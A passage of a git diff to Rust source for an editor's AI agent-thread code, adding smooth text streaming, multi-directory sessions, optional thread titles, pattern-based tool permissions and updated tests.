=> Self::Selected(outcome.into()), + } + } +} + #[derive(Debug)] pub enum ToolCallStatus { /// The tool call hasn't started running yet, but we start showing it to @@ -496,7 +550,7 @@ pub enum ToolCallStatus { /// The tool call is waiting for confirmation from the user. WaitingForConfirmation { options: PermissionOptions, - respond_tx: oneshot::Sender, + respond_tx: oneshot::Sender, }, /// The tool call is currently running. InProgress, @@ -866,6 +920,7 @@ impl Plan { } acp::PlanEntryStatus::InProgress => { stats.in_progress_entry = stats.in_progress_entry.or(Some(entry)); + stats.pending += 1; } acp::PlanEntryStatus::Completed => { stats.completed += 1; @@ -953,9 +1008,9 @@ struct RunningTurn { pub struct AcpThread { session_id: acp::SessionId, - cwd: Option, + work_dirs: Option, parent_session_id: Option, - title: SharedString, + title: Option, provisional_title: Option, entries: Vec, plan: Plan, @@ -976,6 +1031,30 @@ pub struct AcpThread { draft_prompt: Option>, /// The initial scroll position for the thread view, set during session registration. ui_scroll_position: Option, + /// Buffer for smooth text streaming. Holds text that has been received from + /// the model but not yet revealed in the UI. A timer task drains this buffer + /// gradually to create a fluid typing effect instead of choppy chunk-at-a-time + /// updates. + streaming_text_buffer: Option, +} + +struct StreamingTextBuffer { + /// Text received from the model but not yet appended to the Markdown source. + pending: String, + /// The number of bytes to reveal per timer turn. + bytes_to_reveal_per_tick: usize, + /// The Markdown entity being streamed into. + target: Entity, + /// Timer task that periodically moves text from `pending` into `source`. + _reveal_task: Task<()>, +} + +impl StreamingTextBuffer { + /// The number of milliseconds between each timer tick, controlling how quickly + /// text is revealed. + const TASK_UPDATE_MS: u64 = 16; + /// The time in milliseconds to reveal the entire pending text. + const REVEAL_TARGET: f32 = 200.0; } impl From<&AcpThread> for ActionLogTelemetry { @@ -1094,8 +1173,8 @@ impl Error for LoadError {} impl AcpThread { pub fn new( parent_session_id: Option, - title: impl Into, - cwd: Option, + title: Option, + work_dirs: Option, connection: Rc, project: Entity, action_log: Entity, @@ -1116,12 +1195,12 @@ impl AcpThread { Self { parent_session_id, - cwd, + work_dirs, action_log, shared_buffers: Default::default(), entries: Default::default(), plan: Default::default(), - title: title.into(), + title, provisional_title: None, project, running_turn: None, @@ -1137,6 +1216,7 @@ impl AcpThread { had_error: false, draft_prompt: None, ui_scroll_position: None, + streaming_text_buffer: None, } } @@ -1176,10 +1256,14 @@ impl AcpThread { &self.project } - pub fn title(&self) -> SharedString { - self.provisional_title + pub fn title(&self) -> Option { + self.title .clone() - .unwrap_or_else(|| self.title.clone()) + .or_else(|| self.provisional_title.clone()) + } + + pub fn has_provisional_title(&self) -> bool { + self.provisional_title.is_some() } pub fn entries(&self) -> &[AgentThreadEntry] { @@ -1190,8 +1274,8 @@ impl AcpThread { &self.session_id } - pub fn cwd(&self) -> Option<&PathBuf> { - self.cwd.as_ref() + pub fn work_dirs(&self) -> Option<&PathList> { + self.work_dirs.as_ref() } pub fn status(&self) -> ThreadStatus { @@ -1296,6 +1380,18 @@ impl AcpThread { acp::SessionUpdate::Plan(plan) => { self.update_plan(plan, cx); } + acp::SessionUpdate::SessionInfoUpdate(info_update) => { + if let acp::MaybeUndefined::Value(title) = info_update.title { + let had_provisional = self.provisional_title.take().is_some(); + let title: SharedString = title.into(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title); + cx.emit(AcpThreadEvent::TitleUpdated); + } else if had_provisional { + cx.emit(AcpThreadEvent::TitleUpdated); + } + } + } acp::SessionUpdate::AvailableCommandsUpdate(acp::AvailableCommandsUpdate { available_commands, .. @@ -1343,6 +1439,7 @@ impl AcpThread { }) = last_entry && *existing_indented == indented { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); *id = message_id.or(id.take()); content.append(chunk.clone(), &language_registry, path_style, cx); chunks.push(chunk); @@ -1379,8 +1476,20 @@ impl AcpThread { indented: bool, cx: &mut Context, ) { - let language_registry = self.project.read(cx).languages().clone(); let path_style = self.project.read(cx).path_style(cx); + + // For text chunks going to an existing Markdown block, buffer for smooth + // streaming instead of appending all at once which may feel more choppy. + if let acp::ContentBlock::Text(text_content) = &chunk { + if let Some(markdown) = self.streaming_markdown_target(is_thought, indented) { + let entries_len = self.entries.len(); + cx.emit(AcpThreadEvent::EntryUpdated(entries_len - 1)); + self.buffer_streaming_text(&markdown, text_content.text.clone(), cx); + return; + } + } + + let language_registry = self.project.read(cx).languages().clone(); let entries_len = self.entries.len(); if let Some(last_entry) = self.entries.last_mut() && let AgentThreadEntry::AssistantMessage(AssistantMessage { @@ -1391,6 +1500,7 @@ impl AcpThread { && *existing_indented == indented { let idx = entries_len - 1; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); cx.emit(AcpThreadEvent::EntryUpdated(idx)); match (chunks.last_mut(), is_thought) { (Some(AssistantMessageChunk::Message { block }), false) @@ -1425,7 +1535,134 @@ impl AcpThread { } } + fn streaming_markdown_target( + &self, + is_thought: bool, + indented: bool, + ) -> Option> { + let last_entry = self.entries.last()?; + if let AgentThreadEntry::AssistantMessage(AssistantMessage { + chunks, + indented: existing_indented, + .. + }) = last_entry + && *existing_indented == indented + && let [.., chunk] = chunks.as_slice() + { + match (chunk, is_thought) { + ( + AssistantMessageChunk::Message { + block: ContentBlock::Markdown { markdown }, + }, + false, + ) + | ( + AssistantMessageChunk::Thought { + block: ContentBlock::Markdown { markdown }, + }, + true, + ) => Some(markdown.clone()), + _ => None, + } + } else { + None + } + } + + /// Add text to the streaming buffer. If the target changed (e.g. switching + /// from thoughts to message text), flush the old buffer first. + fn buffer_streaming_text( + &mut self, + markdown: &Entity, + text: String, + cx: &mut Context, + ) { + if let Some(buffer) = &mut self.streaming_text_buffer { + if buffer.target.entity_id() == markdown.entity_id() { + buffer.pending.push_str(&text); + + buffer.bytes_to_reveal_per_tick = (buffer.pending.len() as f32 + / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + return; + } + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); + } + + let target = markdown.clone(); + let _reveal_task = self.start_streaming_reveal(cx); + let pending_len = text.len(); + let bytes_to_reveal = (pending_len as f32 / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + self.streaming_text_buffer = Some(StreamingTextBuffer { + pending: text, + bytes_to_reveal_per_tick: bytes_to_reveal, + target, + _reveal_task, + }); + } + + /// Flush all buffered streaming text into the Markdown entity immediately. + fn flush_streaming_text( + streaming_text_buffer: &mut Option, + cx: &mut Context, + ) { + if let Some(buffer) = streaming_text_buffer.take() { + if !buffer.pending.is_empty() { + buffer + .target + .update(cx, |markdown, cx| markdown.append(&buffer.pending, cx)); + } + } + } + + /// Spawns a foreground task that periodically drains + /// `streaming_text_buffer.pending` into the target `Markdown` entity, + /// producing smooth, continuous text output. + fn start_streaming_reveal(&self, cx: &mut Context) -> Task<()> { + cx.spawn(async move |this, cx| { + loop { + cx.background_executor() + .timer(Duration::from_millis(StreamingTextBuffer::TASK_UPDATE_MS)) + .await; + + let should_continue = this + .update(cx, |this, cx| { + let Some(buffer) = &mut this.streaming_text_buffer else { + return false; + }; + + if buffer.pending.is_empty() { + return true; + } + + let pending_len = buffer.pending.len(); + + let byte_boundary = buffer + .pending + .ceil_char_boundary(buffer.bytes_to_reveal_per_tick) + .min(pending_len); + + buffer.target.update(cx, |markdown: &mut Markdown, cx| { + markdown.append(&buffer.pending[..byte_boundary], cx); + buffer.pending.drain(..byte_boundary); + }); + + true + }) + .unwrap_or(false); + + if !should_continue { + break; + } + } + }) + } + fn push_entry(&mut self, entry: AgentThreadEntry, cx: &mut Context) { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.entries.push(entry); cx.emit(AcpThreadEvent::NewEntry); } @@ -1436,8 +1673,8 @@ impl AcpThread { pub fn set_title(&mut self, title: SharedString, cx: &mut Context) -> Task> { let had_provisional = self.provisional_title.take().is_some(); - if title != self.title { - self.title = title.clone(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title.clone()); cx.emit(AcpThreadEvent::TitleUpdated); if let Some(set_title) = self.connection.set_title(&self.session_id, cx) { return set_title.run(title, cx); @@ -1741,7 +1978,7 @@ impl AcpThread { tool_call: acp::ToolCallUpdate, options: PermissionOptions, cx: &mut Context, - ) -> Result> { + ) -> Result> { let (tx, rx) = oneshot::channel(); let status = ToolCallStatus::WaitingForConfirmation { @@ -1757,10 +1994,8 @@ impl AcpThread { Ok(cx.spawn(async move |this, cx| { let outcome = match rx.await { - Ok(option) => acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome::new(option), - ), - Err(oneshot::Canceled) => acp::RequestPermissionOutcome::Cancelled, + Ok(outcome) => RequestPermissionOutcome::Selected(outcome), + Err(oneshot::Canceled) => RequestPermissionOutcome::Cancelled, }; this.update(cx, |_this, cx| { cx.emit(AcpThreadEvent::ToolAuthorizationReceived(tool_call_id)) @@ -1773,15 +2008,14 @@ impl AcpThread { pub fn authorize_tool_call( &mut self, id: acp::ToolCallId, - option_id: acp::PermissionOptionId, - option_kind: acp::PermissionOptionKind, + outcome: SelectedPermissionOutcome, cx: &mut Context, ) { let Some((ix, call)) = self.tool_call_mut(&id) else { return; }; - let new_status = match option_kind { + let new_status = match outcome.option_kind { acp::PermissionOptionKind::RejectOnce | acp::PermissionOptionKind::RejectAlways => { ToolCallStatus::Rejected } @@ -1794,7 +2028,7 @@ impl AcpThread { let curr_status = mem::replace(&mut call.status, new_status); if let ToolCallStatus::WaitingForConfirmation { respond_tx, .. } = curr_status { - respond_tx.send(option_id).log_err(); + respond_tx.send(outcome).log_err(); } else if cfg!(debug_assertions) { panic!("tried to authorize an already authorized tool call"); } @@ -1970,6 +2204,8 @@ impl AcpThread { match response { Ok(r) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + if r.stop_reason == acp::StopReason::MaxTokens { this.had_error = true; cx.emit(AcpThreadEvent::Error); @@ -2022,6 +2258,8 @@ impl AcpThread { Ok(Some(r)) } Err(e) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + this.had_error = true; cx.emit(AcpThreadEvent::Error); log::error!("Error in run turn: {:?}", e); @@ -2039,6 +2277,7 @@ impl AcpThread { }; self.connection.cancel(&self.session_id, cx); + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.mark_pending_tools_as_canceled(); // Wait for the send task to complete @@ -2103,6 +2342,7 @@ impl AcpThread { return Task::ready(Err(anyhow!("not supported"))); }; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); let telemetry = ActionLogTelemetry::from(&*self); cx.spawn(async move |this, cx| { cx.update(|cx| truncate.run(id.clone(), cx)).await?; @@ -2682,7 +2922,7 @@ mod tests { use futures::{channel::mpsc, future::LocalBoxFuture, select}; use gpui::{App, AsyncApp, TestAppContext, WeakEntity}; use indoc::indoc; - use project::{FakeFs, Fs}; + use project::{AgentId, FakeFs, Fs}; use rand::{distr, prelude::*}; use serde_json::json; use settings::SettingsStore; @@ -2695,7 +2935,7 @@ mod tests { sync::atomic::{AtomicBool, AtomicUsize, Ordering::SeqCst}, time::Duration, }; - use util::path; + use util::{path, path_list::PathList}; fn init_test(cx: &mut TestAppContext) { env_logger::try_init().ok(); @@ -2713,7 +2953,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2777,7 +3023,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2865,7 +3117,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project.clone(), Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project.clone(), + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2976,7 +3234,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3070,7 +3330,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3151,7 +3413,9 @@ mod tests { .unwrap(); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3192,7 +3456,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3267,7 +3533,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3341,7 +3609,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3389,7 +3659,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3480,7 +3752,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3539,7 +3813,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3712,7 +3988,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3788,7 +4066,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3861,7 +4141,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3982,6 +4264,10 @@ mod tests { } impl AgentConnection for FakeAgentConnection { + fn agent_id(&self) -> AgentId { + AgentId::new("fake") + } + fn telemetry_id(&self) -> SharedString { "fake".into() } @@ -3993,7 +4279,7 @@ mod tests { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { let session_id = acp::SessionId::new( @@ -4007,8 +4293,8 @@ mod tests { let thread = cx.new(|cx| { AcpThread::new( None, - "Test", - Some(cwd.to_path_buf()), + None, + Some(work_dirs), self.clone(), project, action_log, @@ -4027,7 +4313,7 @@ mod tests { } fn authenticate(&self, method: acp::AuthMethodId, _cx: &mut App) -> Task> { - if self.auth_methods().iter().any(|m| m.id == method) { + if self.auth_methods().iter().any(|m| m.id() == &method) { Task::ready(Ok(())) } else { Task::ready(Err(anyhow!("Invalid Auth Method"))) @@ -4107,7 +4393,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4173,7 +4461,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4486,7 +4776,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4560,7 +4852,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4643,7 +4937,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4691,13 +4987,15 @@ mod tests { let set_title_calls = connection.set_title_calls.clone(); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); // Initial title is the default. thread.read_with(cx, |thread, _| { - assert_eq!(thread.title().as_ref(), "Test"); + assert_eq!(thread.title(), None); }); // Setting a provisional title updates the display title. @@ -4705,7 +5003,10 @@ mod tests { thread.set_provisional_title("Hello, can you help…".into(), cx); }); thread.read_with(cx, |thread, _| { - assert_eq!(thread.title().as_ref(), "Hello, can you help…"); + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Hello, can you help…") + ); }); // The provisional title should NOT have propagated to the connection. @@ -4722,7 +5023,10 @@ mod tests { }); task.await.expect("set_title should succeed"); thread.read_with(cx, |thread, _| { - assert_eq!(thread.title().as_ref(), "Helping with Rust question"); + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); }); assert_eq!( set_title_calls.borrow().as_slice(), @@ -4730,4 +5034,80 @@ mod tests { "real title should propagate to the connection" ); } + + #[gpui::test] + async fn test_session_info_update_replaces_provisional_title_and_emits_event( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let connection = Rc::new(FakeAgentConnection::new()); + + let thread = cx + .update(|cx| { + connection.clone().new_session( + project, + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) + .await + .unwrap(); + + let title_updated_events = Rc::new(RefCell::new(0usize)); + let title_updated_events_for_subscription = title_updated_events.clone(); + thread.update(cx, |_thread, cx| { + cx.subscribe( + &thread, + move |_thread, _event_thread, event: &AcpThreadEvent, _cx| { + if matches!(event, AcpThreadEvent::TitleUpdated) { + *title_updated_events_for_subscription.borrow_mut() += 1; + } + }, + ) + .detach(); + }); + + thread.update(cx, |thread, cx| { + thread.set_provisional_title("Hello, can you help…".into(), cx); + }); + assert_eq!( + *title_updated_events.borrow(), + 1, + "setting a provisional title should emit TitleUpdated" + ); + + let result = thread.update(cx, |thread, cx| { + thread.handle_session_update( + acp::SessionUpdate::SessionInfoUpdate( + acp::SessionInfoUpdate::new().title("Helping with Rust question"), + ), + cx, + ) + }); + result.expect("session info update should succeed"); + + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); + assert!( + !thread.has_provisional_title(), + "session info title update should clear provisional title" + ); + }); + + assert_eq!( + *title_updated_events.borrow(), + 2, + "session info title update should emit TitleUpdated" + ); + assert!( + connection.set_title_calls.borrow().is_empty(), + "session info title update should not propagate back to the connection" + ); + } } diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index 644986bc15eccbe7d2be32ea5ad6e422db930541..58a8aa33830f12ffb713490c87c47133cc2ad96f 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -2,20 +2,15 @@ use crate::AcpThread; use agent_client_protocol::{self as acp}; use anyhow::Result; use chrono::{DateTime, Utc}; -use collections::IndexMap; +use collections::{HashMap, IndexMap}; use gpui::{Entity, SharedString, Task}; use language_model::LanguageModelProviderId; -use project::Project; +use project::{AgentId, Project}; use serde::{Deserialize, Serialize}; -use std::{ - any::Any, - error::Error, - fmt, - path::{Path, PathBuf}, - rc::Rc, - sync::Arc, -}; +use std::{any::Any, error::Error, fmt, path::PathBuf, rc::Rc, sync::Arc}; +use task::{HideStrategy, SpawnInTerminal, TaskId}; use ui::{App, IconName}; +use util::path_list::PathList; use uuid::Uuid; #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)] @@ -27,13 +22,37 @@ impl UserMessageId { } } +pub fn build_terminal_auth_task( + id: String, + label: String, + command: String, + args: Vec, + env: HashMap, +) -> SpawnInTerminal { + SpawnInTerminal { + id: TaskId(id), + full_label: label.clone(), + label: label.clone(), + command: Some(command), + args, + command_label: label, + env, + use_new_terminal: true, + allow_concurrent_runs: true, + hide: HideStrategy::Always, + ..Default::default() + } +} + pub trait AgentConnection { + fn agent_id(&self) -> AgentId; + fn telemetry_id(&self) -> SharedString; fn new_session( self: Rc, project: Entity, - cwd: &Path, + _work_dirs: PathList, cx: &mut App, ) -> Task>>; @@ -47,7 +66,7 @@ pub trait AgentConnection { self: Rc, _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, _title: Option, _cx: &mut App, ) -> Task>> { @@ -60,7 +79,11 @@ pub trait AgentConnection { } /// Close an existing session. Allows the agent to free the session from memory. - fn close_session(&self, _session_id: &acp::SessionId, _cx: &mut App) -> Task> { + fn close_session( + self: Rc, + _session_id: &acp::SessionId, + _cx: &mut App, + ) -> Task> { Task::ready(Err(anyhow::Error::msg("Closing sessions is not supported"))) } @@ -74,7 +97,7 @@ pub trait AgentConnection { self: Rc, _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, _title: Option, _cx: &mut App, ) -> Task>> { @@ -90,6 +113,14 @@ pub trait AgentConnection { fn auth_methods(&self) -> &[acp::AuthMethod]; + fn terminal_auth_task( + &self, + _method: &acp::AuthMethodId, + _cx: &App, + ) -> Option { + None + } + fn authenticate(&self, method: acp::AuthMethodId, cx: &mut App) -> Task>; fn prompt( @@ -239,9 +270,10 @@ impl AgentSessionListResponse { #[derive(Debug, Clone, PartialEq)] pub struct AgentSessionInfo { pub session_id: acp::SessionId, - pub cwd: Option, + pub work_dirs: Option, pub title: Option, pub updated_at: Option>, + pub created_at: Option>, pub meta: Option, } @@ -249,9 +281,10 @@ impl AgentSessionInfo { pub fn new(session_id: impl Into) -> Self { Self { session_id: session_id.into(), - cwd: None, + work_dirs: None, title: None, updated_at: None, + created_at: None, meta: None, } } @@ -437,18 +470,53 @@ impl AgentModelList { pub struct PermissionOptionChoice { pub allow: acp::PermissionOption, pub deny: acp::PermissionOption, + pub sub_patterns: Vec, } impl PermissionOptionChoice { pub fn label(&self) -> SharedString { self.allow.name.clone().into() } + + /// Build a `SelectedPermissionOutcome` for this choice. + /// + /// If the choice carries `sub_patterns`, they are attached as + /// `SelectedPermissionParams::Terminal`. + pub fn build_outcome(&self, is_allow: bool) -> crate::SelectedPermissionOutcome { + let option = if is_allow { &self.allow } else { &self.deny }; + + let params = if !self.sub_patterns.is_empty() { + Some(crate::SelectedPermissionParams::Terminal { + patterns: self.sub_patterns.clone(), + }) + } else { + None + }; + + crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind).params(params) + } +} + +/// Pairs a tool's permission pattern with its display name +/// +/// For example, a pattern of `^cargo\\s+build(\\s|$)` would display as `cargo +/// build`. It's handy to keep these together rather than trying to derive +/// one from the other. +#[derive(Debug, Clone, PartialEq)] +pub struct PermissionPattern { + pub pattern: String, + pub display_name: String, } #[derive(Debug, Clone)] pub enum PermissionOptions { Flat(Vec), Dropdown(Vec), + DropdownWithPatterns { + choices: Vec, + patterns: Vec, + tool_name: String, + }, } impl PermissionOptions { @@ -456,6 +524,7 @@ impl PermissionOptions { match self { PermissionOptions::Flat(options) => options.is_empty(), PermissionOptions::Dropdown(options) => options.is_empty(), + PermissionOptions::DropdownWithPatterns { choices, .. } => choices.is_empty(), } } @@ -474,6 +543,17 @@ impl PermissionOptions { None } }), + PermissionOptions::DropdownWithPatterns { choices, .. } => { + choices.iter().find_map(|choice| { + if choice.allow.kind == kind { + Some(&choice.allow) + } else if choice.deny.kind == kind { + Some(&choice.deny) + } else { + None + } + }) + } } } @@ -486,6 +566,57 @@ impl PermissionOptions { self.first_option_of_kind(acp::PermissionOptionKind::RejectOnce) .map(|option| option.option_id.clone()) } + + /// Build a `SelectedPermissionOutcome` for the `DropdownWithPatterns` + /// variant when the user has checked specific pattern indices. + /// + /// Returns `Some` with the always-allow/deny outcome when at least one + /// pattern is checked. Returns `None` when zero patterns are checked, + /// signaling that the caller should degrade to allow-once / deny-once. + /// + /// Panics (debug) or returns `None` (release) if called on a non- + /// `DropdownWithPatterns` variant. + pub fn build_outcome_for_checked_patterns( + &self, + checked_indices: &[usize], + is_allow: bool, + ) -> Option { + let PermissionOptions::DropdownWithPatterns { + choices, patterns, .. + } = self + else { + debug_assert!( + false, + "build_outcome_for_checked_patterns called on non-DropdownWithPatterns" + ); + return None; + }; + + let checked_patterns: Vec = patterns + .iter() + .enumerate() + .filter(|(index, _)| checked_indices.contains(index)) + .map(|(_, cp)| cp.pattern.clone()) + .collect(); + + if checked_patterns.is_empty() { + return None; + } + + // Use the first choice (the "Always" choice) as the base for the outcome. + let always_choice = choices.first()?; + let option = if is_allow { + &always_choice.allow + } else { + &always_choice.deny + }; + + let outcome = crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind) + .params(Some(crate::SelectedPermissionParams::Terminal { + patterns: checked_patterns, + })); + Some(outcome) + } } #[cfg(feature = "test-support")] @@ -534,11 +665,14 @@ mod test_support { ) } - #[derive(Clone, Default)] + #[derive(Clone)] pub struct StubAgentConnection { sessions: Arc>>, permission_requests: HashMap, next_prompt_updates: Arc>>, + supports_load_session: bool, + agent_id: AgentId, + telemetry_id: SharedString, } struct Session { @@ -546,12 +680,21 @@ mod test_support { response_tx: Option>, } + impl Default for StubAgentConnection { + fn default() -> Self { + Self::new() + } + } + impl StubAgentConnection { pub fn new() -> Self { Self { next_prompt_updates: Default::default(), permission_requests: HashMap::default(), sessions: Arc::default(), + supports_load_session: false, + agent_id: AgentId::new("stub"), + telemetry_id: "stub".into(), } } @@ -567,6 +710,58 @@ mod test_support { self } + pub fn with_supports_load_session(mut self, supports_load_session: bool) -> Self { + self.supports_load_session = supports_load_session; + self + } + + pub fn with_agent_id(mut self, agent_id: AgentId) -> Self { + self.agent_id = agent_id; + self + } + + pub fn with_telemetry_id(mut self, telemetry_id: SharedString) -> Self { + self.telemetry_id = telemetry_id; + self + } + + fn create_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut gpui::App, + ) -> Entity { + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let thread = cx.new(|cx| { + AcpThread::new( + None, + title, + Some(work_dirs), + self.clone(), + project, + action_log, + session_id.clone(), + watch::Receiver::constant( + acp::PromptCapabilities::new() + .image(true) + .audio(true) + .embedded_context(true), + ), + cx, + ) + }); + self.sessions.lock().insert( + session_id, + Session { + thread: thread.downgrade(), + response_tx: None, + }, + ); + thread + } + pub fn send_update( &self, session_id: acp::SessionId, @@ -603,8 +798,12 @@ mod test_support { } impl AgentConnection for StubAgentConnection { + fn agent_id(&self) -> AgentId { + self.agent_id.clone() + } + fn telemetry_id(&self) -> SharedString { - "stub".into() + self.telemetry_id.clone() } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -621,38 +820,33 @@ mod test_support { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut gpui::App, ) -> Task>> { static NEXT_SESSION_ID: AtomicUsize = AtomicUsize::new(0); let session_id = acp::SessionId::new(NEXT_SESSION_ID.fetch_add(1, Ordering::SeqCst).to_string()); - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let thread = cx.new(|cx| { - AcpThread::new( - None, - "Test", - Some(cwd.to_path_buf()), - self.clone(), - project, - action_log, - session_id.clone(), - watch::Receiver::constant( - acp::PromptCapabilities::new() - .image(true) - .audio(true) - .embedded_context(true), - ), - cx, - ) - }); - self.sessions.lock().insert( - session_id, - Session { - thread: thread.downgrade(), - response_tx: None, - }, - ); + let thread = self.create_session(session_id, project, work_dirs, None, cx); + Task::ready(Ok(thread)) + } + + fn supports_load_session(&self) -> bool { + self.supports_load_session + } + + fn load_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut App, + ) -> Task>> { + if !self.supports_load_session { + return Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported"))); + } + + let thread = self.create_session(session_id, project, work_dirs, title, cx); Task::ready(Ok(thread)) } diff --git a/crates/acp_thread/src/mention.rs 